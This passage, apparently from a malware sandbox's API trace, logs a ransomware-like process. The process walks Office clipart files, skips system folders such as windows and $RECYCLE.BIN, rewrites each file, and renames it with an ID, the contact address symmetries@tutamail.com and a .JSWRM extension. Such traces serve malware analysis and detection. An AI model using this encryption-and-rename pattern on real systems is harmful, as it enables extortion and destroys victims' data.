lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.213] CloseHandle (hObject=0x314) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0089.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0089.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0089.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.214] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0301052.WMF", cAlternateFileName="")) returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2=".") returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="..") returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="...") returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="windows") returned -1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="recovery") returned -1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="perflogs") returned -1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="documents and settings") returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.214] lstrcmpiW (lpString1="J0301052.WMF", lpString2="system volume information") returned -1 [0089.215] lstrcmpiW (lpString1="J0301052.WMF", lpString2="msocache") returned -1 [0089.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301052.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301052.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301052.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301052.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301052.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301052.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.215] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10984) returned 1 [0089.215] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ae0) returned 0x24d210 [0089.215] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ae0, lpOverlapped=0x0) returned 1 [0089.219] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.219] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ae0, lpOverlapped=0x0) returned 1 [0089.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.219] CloseHandle (hObject=0x314) returned 1 [0089.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0089.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0089.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.220] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0089.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.221] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a5a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0301418.WMF", cAlternateFileName="")) returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2=".") returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="..") returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="...") returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="windows") returned -1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="recovery") returned -1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="perflogs") returned -1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="documents and settings") returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="system volume information") returned -1 [0089.221] lstrcmpiW (lpString1="J0301418.WMF", lpString2="msocache") returned -1 [0089.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301418.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301418.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301418.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0089.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301418.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301418.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301418.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0089.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.222] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19034) returned 1 [0089.222] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a50) returned 0x24d210 [0089.222] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4a50, lpOverlapped=0x0) returned 1 [0089.226] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.226] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4a50, lpOverlapped=0x0) returned 1 [0089.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.226] CloseHandle (hObject=0x314) returned 1 [0089.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0089.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0089.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.227] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.228] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4dfa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0301432.WMF", cAlternateFileName="")) returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2=".") returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="..") returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="...") returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="windows") returned -1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="recovery") returned -1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="perflogs") returned -1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="documents and settings") returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="system volume information") returned -1 [0089.228] lstrcmpiW (lpString1="J0301432.WMF", lpString2="msocache") returned -1 [0089.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301432.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301432.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0089.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301432.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301432.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.229] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19962) returned 1 [0089.229] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24d210 [0089.229] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4df0, lpOverlapped=0x0) returned 1 [0089.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.233] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4df0, lpOverlapped=0x0) returned 1 [0089.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.233] CloseHandle (hObject=0x314) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0089.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0089.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0089.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.234] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf"), lpNewFileName="C:\\Program Files\\Microsoft 